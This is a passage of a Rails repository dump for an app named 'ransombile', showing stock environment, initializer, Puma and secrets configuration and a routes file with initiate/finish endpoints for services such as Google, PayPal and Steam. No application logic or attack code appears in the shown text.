35 | # config.action_dispatch.x_sendfile_header = 'X-Accel-Redirect' # for NGINX
36 |
37 | # Mount Action Cable outside main process or domain
38 | # config.action_cable.mount_path = nil
39 | # config.action_cable.url = 'wss://example.com/cable'
40 | # config.action_cable.allowed_request_origins = [ 'http://example.com', /http:\/\/example.*/ ]
41 |
42 | # Force all access to the app over SSL, use Strict-Transport-Security, and use secure cookies.
43 | # config.force_ssl = true
44 |
45 | # Use the lowest log level to ensure availability of diagnostic information
46 | # when problems arise.
47 | config.log_level = :debug
48 |
49 | # Prepend all log lines with the following tags.
50 | config.log_tags = [ :request_id ]
51 |
52 | # Use a different cache store in production.
53 | # config.cache_store = :mem_cache_store
54 |
55 | # Use a real queuing backend for Active Job (and separate queues per environment)
56 | # config.active_job.queue_adapter = :resque
57 | # config.active_job.queue_name_prefix = "ransombile_#{Rails.env}"
58 | config.action_mailer.perform_caching = false
59 |
60 | # Ignore bad email addresses and do not raise email delivery errors.
61 | # Set this to true and configure the email server for immediate delivery to raise delivery errors.
62 | # config.action_mailer.raise_delivery_errors = false
63 |
64 | # Enable locale fallbacks for I18n (makes lookups for any locale fall back to
65 | # the I18n.default_locale when a translation cannot be found).
66 | config.i18n.fallbacks = true
67 |
68 | # Send deprecation notices to registered listeners.
69 | config.active_support.deprecation = :notify
70 |
71 | # Use default logging formatter so that PID and timestamp are not suppressed.
72 | config.log_formatter = ::Logger::Formatter.new
73 |
74 | # Use a different logger for distributed setups.
75 | # require 'syslog/logger'
76 | # config.logger = ActiveSupport::TaggedLogging.new(Syslog::Logger.new 'app-name')
77 |
78 | if ENV["RAILS_LOG_TO_STDOUT"].present?
79 | logger = ActiveSupport::Logger.new(STDOUT)
80 | logger.formatter = config.log_formatter
81 | config.logger = ActiveSupport::TaggedLogging.new(logger)
82 | end
83 |
84 | # Do not dump schema after migrations.
85 | config.active_record.dump_schema_after_migration = false
86 | end
87 |
--------------------------------------------------------------------------------
/config/environments/test.rb:
--------------------------------------------------------------------------------
1 | Rails.application.configure do
2 | # Settings specified here will take precedence over those in config/application.rb.
3 |
4 | # The test environment is used exclusively to run your application's
5 | # test suite. You never need to work with it otherwise. Remember that
6 | # your test database is "scratch space" for the test suite and is wiped
7 | # and recreated between test runs. Don't rely on the data there!
8 | config.cache_classes = true
9 |
10 | # Do not eager load code on boot. This avoids loading your whole application
11 | # just for the purpose of running a single test. If you are using a tool that
12 | # preloads Rails for running tests, you may have to set it to true.
13 | config.eager_load = false
14 |
15 | # Configure public file server for tests with Cache-Control for performance.
16 | config.public_file_server.enabled = true
17 | config.public_file_server.headers = {
18 | 'Cache-Control' => 'public, max-age=3600'
19 | }
20 |
21 | # Show full error reports and disable caching.
22 | config.consider_all_requests_local = true
23 | config.action_controller.perform_caching = false
24 |
25 | # Raise exceptions instead of rendering exception templates.
26 | config.action_dispatch.show_exceptions = false
27 |
28 | # Disable request forgery protection in test environment.
29 | config.action_controller.allow_forgery_protection = false
30 | config.action_mailer.perform_caching = false
31 |
32 | # Tell Action Mailer not to deliver emails to the real world.
33 | # The :test delivery method accumulates sent emails in the
34 | # ActionMailer::Base.deliveries array.
35 | config.action_mailer.delivery_method = :test
36 |
37 | # Print deprecation notices to the stderr.
38 | config.active_support.deprecation = :stderr
39 |
40 | # Raises error for missing translations
41 | # config.action_view.raise_on_missing_translations = true
42 | end
43 |
--------------------------------------------------------------------------------
/config/initializers/application_controller_renderer.rb:
--------------------------------------------------------------------------------
1 | # Be sure to restart your server when you modify this file.
2 |
3 | # ApplicationController.renderer.defaults.merge!(
4 | # http_host: 'example.org',
5 | # https: false
6 | # )
7 |
--------------------------------------------------------------------------------
/config/initializers/assets.rb:
--------------------------------------------------------------------------------
1 | # Be sure to restart your server when you modify this file.
2 |
3 | # Version of your assets, change this if you want to expire all your assets.
4 | Rails.application.config.assets.version = '1.0'
5 |
6 | # Add additional assets to the asset load path
7 | # Rails.application.config.assets.paths << Emoji.images_path
8 |
9 | # Precompile additional assets.
10 | # application.js, application.css, and all non-JS/CSS in app/assets folder are already added.
11 | # Rails.application.config.assets.precompile += %w( search.js )
12 |
--------------------------------------------------------------------------------
/config/initializers/backtrace_silencers.rb:
--------------------------------------------------------------------------------
1 | # Be sure to restart your server when you modify this file.
2 |
3 | # You can add backtrace silencers for libraries that you're using but don't wish to see in your backtraces.
4 | # Rails.backtrace_cleaner.add_silencer { |line| line =~ /my_noisy_library/ }
5 |
6 | # You can also remove all the silencers if you're trying to debug a problem that might stem from framework code.
7 | # Rails.backtrace_cleaner.remove_silencers!
8 |
--------------------------------------------------------------------------------
/config/initializers/cookies_serializer.rb:
--------------------------------------------------------------------------------
1 | # Be sure to restart your server when you modify this file.
2 |
3 | # Specify a serializer for the signed and encrypted cookie jars.
4 | # Valid options are :json, :marshal, and :hybrid.
5 | Rails.application.config.action_dispatch.cookies_serializer = :json
6 |
--------------------------------------------------------------------------------
/config/initializers/filter_parameter_logging.rb:
--------------------------------------------------------------------------------
1 | # Be sure to restart your server when you modify this file.
2 |
3 | # Configure sensitive parameters which will be filtered from the log file.
4 | Rails.application.config.filter_parameters += [:password]
5 |
--------------------------------------------------------------------------------
/config/initializers/inflections.rb:
--------------------------------------------------------------------------------
1 | # Be sure to restart your server when you modify this file.
2 |
3 | # Add new inflection rules using the following format. Inflections
4 | # are locale specific, and you may define rules for as many different
5 | # locales as you wish. All of these examples are active by default:
6 | # ActiveSupport::Inflector.inflections(:en) do |inflect|
7 | # inflect.plural /^(ox)$/i, '\1en'
8 | # inflect.singular /^(ox)en/i, '\1'
9 | # inflect.irregular 'person', 'people'
10 | # inflect.uncountable %w( fish sheep )
11 | # end
12 |
13 | # These inflection rules are supported but not enabled by default:
14 | # ActiveSupport::Inflector.inflections(:en) do |inflect|
15 | # inflect.acronym 'RESTful'
16 | # end
17 |
--------------------------------------------------------------------------------
/config/initializers/mime_types.rb:
--------------------------------------------------------------------------------
1 | # Be sure to restart your server when you modify this file.
2 |
3 | # Add new mime types for use in respond_to blocks:
4 | # Mime::Type.register "text/richtext", :rtf
5 |
--------------------------------------------------------------------------------
/config/initializers/new_framework_defaults.rb:
--------------------------------------------------------------------------------
1 | # Be sure to restart your server when you modify this file.
2 | #
3 | # This file contains migration options to ease your Rails 5.0 upgrade.
4 | #
5 | # Read the Guide for Upgrading Ruby on Rails for more info on each option.
6 |
7 | # Enable per-form CSRF tokens. Previous versions had false.
8 | Rails.application.config.action_controller.per_form_csrf_tokens = true
9 |
10 | # Enable origin-checking CSRF mitigation. Previous versions had false.
11 | Rails.application.config.action_controller.forgery_protection_origin_check = true
12 |
13 | # Make Ruby 2.4 preserve the timezone of the receiver when calling `to_time`.
14 | # Previous versions had false.
15 | ActiveSupport.to_time_preserves_timezone = true
16 |
17 | # Require `belongs_to` associations by default. Previous versions had false.
18 | Rails.application.config.active_record.belongs_to_required_by_default = true
19 |
20 | # Do not halt callback chains when a callback returns false. Previous versions had true.
21 | ActiveSupport.halt_callback_chains_on_return_false = false
22 |
23 | # Configure SSL options to enable HSTS with subdomains. Previous versions had false.
24 | Rails.application.config.ssl_options = { hsts: { subdomains: true } }
25 |
--------------------------------------------------------------------------------
/config/initializers/session_store.rb:
--------------------------------------------------------------------------------
1 | # Be sure to restart your server when you modify this file.
2 |
3 | Rails.application.config.session_store :cookie_store, key: '_ransombile_session'
4 |
--------------------------------------------------------------------------------
/config/initializers/wrap_parameters.rb:
--------------------------------------------------------------------------------
1 | # Be sure to restart your server when you modify this file.
2 |
3 | # This file contains settings for ActionController::ParamsWrapper which
4 | # is enabled by default.
5 |
6 | # Enable parameter wrapping for JSON. You can disable this by setting :format to an empty array.
7 | ActiveSupport.on_load(:action_controller) do
8 | wrap_parameters format: [:json]
9 | end
10 |
11 | # To enable root element in JSON for ActiveRecord objects.
12 | # ActiveSupport.on_load(:active_record) do
13 | # self.include_root_in_json = true
14 | # end
15 |
--------------------------------------------------------------------------------
/config/locales/en.yml:
--------------------------------------------------------------------------------
1 | # Files in the config/locales directory are used for internationalization
2 | # and are automatically loaded by Rails. If you want to use locales other
3 | # than English, add the necessary files in this directory.
4 | #
5 | # To use the locales, use `I18n.t`:
6 | #
7 | # I18n.t 'hello'
8 | #
9 | # In views, this is aliased to just `t`:
10 | #
11 | # <%= t('hello') %>
12 | #
13 | # To use a different locale, set it with `I18n.locale`:
14 | #
15 | # I18n.locale = :es
16 | #
17 | # This would use the information in config/locales/es.yml.
18 | #
19 | # To learn more, please read the Rails Internationalization guide
20 | # available at http://guides.rubyonrails.org/i18n.html.
21 |
22 | en:
23 | hello: "Hello world"
24 |
--------------------------------------------------------------------------------
/config/puma.rb:
--------------------------------------------------------------------------------
1 | # Puma can serve each request in a thread from an internal thread pool.
2 | # The `threads` method setting takes two numbers a minimum and maximum.
3 | # Any libraries that use thread pools should be configured to match
4 | # the maximum value specified for Puma. Default is set to 5 threads for minimum
5 | # and maximum, this matches the default thread size of Active Record.
6 | #
7 | threads_count = ENV.fetch("RAILS_MAX_THREADS") { 5 }.to_i
8 | threads threads_count, threads_count
9 |
10 | # Specifies the `port` that Puma will listen on to receive requests, default is 3000.
11 | #
12 | port ENV.fetch("PORT") { 3000 }
13 |
14 | # Specifies the `environment` that Puma will run in.
15 | #
16 | environment ENV.fetch("RAILS_ENV") { "development" }
17 |
18 | # Specifies the number of `workers` to boot in clustered mode.
19 | # Workers are forked webserver processes. If using threads and workers together
20 | # the concurrency of the application would be max `threads` * `workers`.
21 | # Workers do not work on JRuby or Windows (both of which do not support
22 | # processes).
23 | #
24 | # workers ENV.fetch("WEB_CONCURRENCY") { 2 }
25 |
26 | # Use the `preload_app!` method when specifying a `workers` number.
27 | # This directive tells Puma to first boot the application and load code
28 | # before forking the application. This takes advantage of Copy On Write
29 | # process behavior so workers use less memory. If you use this option
30 | # you need to make sure to reconnect any threads in the `on_worker_boot`
31 | # block.
32 | #
33 | # preload_app!
34 |
35 | # The code in the `on_worker_boot` will be called if you are using
36 | # clustered mode by specifying a number of `workers`. After each worker
37 | # process is booted this block will be run, if you are using `preload_app!`
38 | # option you will want to use this block to reconnect to any threads
39 | # or connections that may have been created at application boot, Ruby
40 | # cannot share connections between processes.
41 | #
42 | # on_worker_boot do
43 | # ActiveRecord::Base.establish_connection if defined?(ActiveRecord)
44 | # end
45 |
46 | # Allow puma to be restarted by `rails restart` command.
47 | plugin :tmp_restart
48 |
--------------------------------------------------------------------------------
/config/routes.rb:
--------------------------------------------------------------------------------
1 | Rails.application.routes.draw do
2 | get 'ransombile/index'
3 | get 'ransombile/checkMail'
4 |
5 | get 'google/initiate'
6 | get 'google/finish'
7 |
8 | get 'twitter/initiate'
9 | get 'twitter/finish'
10 |
11 | get 'facebook/initiate'
12 | get 'facebook/finish'
13 |
14 | get 'linkedin/initiate'
15 | get 'linkedin/finish'
16 |
17 | get 'paypal/initiate'
18 | get 'paypal/finish'
19 |
20 | get 'ebay/initiate'
21 | get 'ebay/finish'
22 |
23 | get 'wordpress/initiate'
24 | get 'wordpress/finish'
25 |
26 | get 'steam/initiate'
27 | get 'steam/finish'
28 |
29 | root 'ransombile#index'
30 | end
31 |
--------------------------------------------------------------------------------
/config/secrets.yml:
--------------------------------------------------------------------------------
1 | # Be sure to restart your server when you modify this file.
2 |
3 | # Your secret key is used for verifying the integrity of signed cookies.
4 | # If you change this key, all old signed cookies will become invalid!
5 |
6 | # Make sure the secret is at least 30 characters and all random,
7 | # no regular words or you'll be exposed to dictionary attacks.
8 | # You can use `rails secret` to generate a secure secret key.
9 |
10 | # Make sure the secrets in this file are kept private
11 | # if you're sharing your code publicly.
12 |
13 | development:
14 | secret_key_base: 20b36ab1ee5d5a48bb24b66e4c383187aadadb3d8a5e7ef3ee99caad9f7ce4ed8925cd88d06e612bf9b0cecd6b20dc148d735737bcb2558fd9890fd46f0ebb5d
15 |
16 | test:
17 | secret_key_base: e413878448283dabf98a9e864628e1325c593f8818ecb4e4ce8cdb00babcaa928d141f34883707b508e51a713f12a032852ad15d3fec82f71b2dde4d2be82462
18 |
19 | # Do not keep production secrets in the repository,
20 | # instead read values from the environment.
21 | production:
22 | secret_key_base: <%= ENV["SECRET_KEY_BASE"] %>
23 |
--------------------------------------------------------------------------------
/config/spring.rb:
--------------------------------------------------------------------------------
1 | %w(
2 | .ruby-version
3 | .rbenv-vars
4 | tmp/restart.txt
5 | tmp/caching-dev.txt
6 | ).each { |path| Spring.watch(path) }
7 |
--------------------------------------------------------------------------------
/db/development.sqlite3:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/martinvigo/ransombile/a02507c9a386d3e8df92c876876082edab52b800/db/development.sqlite3
--------------------------------------------------------------------------------
/db/seeds.rb:
--------------------------------------------------------------------------------
1 | # This file should contain all the record creation needed to seed the database with its default values.
2 | # The data can then be loaded with the rails db:seed command (or created alongside the database with db:setup).
3 | #
4 | # Examples:
5 | #
6 | # movies = Movie.create([{ name: 'Star Wars' }, { name: 'Lord of the Rings' }])
7 | # Character.create(name: 'Luke', movie: movies.first)
8 |
--------------------------------------------------------------------------------
/lib/assets/.keep:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/martinvigo/ransombile/a02507c9a386d3e8df92c876876082edab52b800/lib/assets/.keep
--------------------------------------------------------------------------------
/lib/tasks/.keep:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/martinvigo/ransombile/a02507c9a386d3e8df92c876876082edab52b800/lib/tasks/.keep
--------------------------------------------------------------------------------
/log/.keep:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/martinvigo/ransombile/a02507c9a386d3e8df92c876876082edab52b800/log/.keep
--------------------------------------------------------------------------------
/public/404.html:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 | The page you were looking for doesn't exist (404)
5 |
6 |
55 |
56 |
57 |
58 |
59 |
60 |
61 |
The page you were looking for doesn't exist.
62 |
You may have mistyped the address or the page may have moved.
63 |
64 |
If you are the application owner check the logs for more information.